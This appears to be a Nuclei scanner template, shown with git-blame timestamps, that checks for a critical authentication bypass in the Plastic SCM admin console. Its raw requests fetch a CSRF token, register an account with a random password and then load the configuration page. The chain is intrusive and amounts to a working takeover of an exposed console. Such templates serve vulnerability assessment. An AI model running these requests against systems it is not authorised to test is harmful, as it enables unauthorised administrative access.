2021-07-03 11:07:11 +00:00
|
|
|
id: unauthorized-plastic-scm
|
|
|
|
|
|
|
|
info:
|
2022-05-23 21:29:29 +00:00
|
|
|
name: Plastic Admin Console - Authentication Bypass
|
2021-07-03 11:07:11 +00:00
|
|
|
author: DEENA
|
|
|
|
severity: critical
|
2022-05-23 21:29:29 +00:00
|
|
|
description: A Plastic Admin console was discovered.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468
|
2022-05-23 21:29:29 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
2023-10-14 11:27:55 +00:00
|
|
|
cvss-score: 10
|
2022-05-23 21:29:29 +00:00
|
|
|
cwe-id: CWE-288
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 3
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: plastic,misconfig,intrusive
|
2021-07-03 11:07:11 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-07-03 11:07:11 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /account/register HTTP/1.1
|
|
|
|
{{Hostname}}
|
|
|
|
- |
|
|
|
|
POST /account/register HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Origin: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
Referer: {{BaseURL}}/account/register
|
|
|
|
Connection: close
|
|
|
|
|
|
|
|
Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false
|
|
|
|
- |
|
|
|
|
GET /configuration HTTP/1.1
|
|
|
|
{{Hostname}}
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
internal: true
|
|
|
|
group: 1
|
|
|
|
name: csrf
|
|
|
|
regex:
|
|
|
|
- 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<title>Network - Plastic SCM</title>"
|
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-11-27 10:10:24 +00:00
|
|
|
# digest: 4b0a00483046022100bea1d6873fe7545d710a21e89f24e4e08aac08e44c85065970e57b7e658204b0022100c320ab0788b27b5733e65ab3ebf0c685204cfefb35b31625b0353ed4faa01433:922c64590222798bb761d5b6d8e72950
|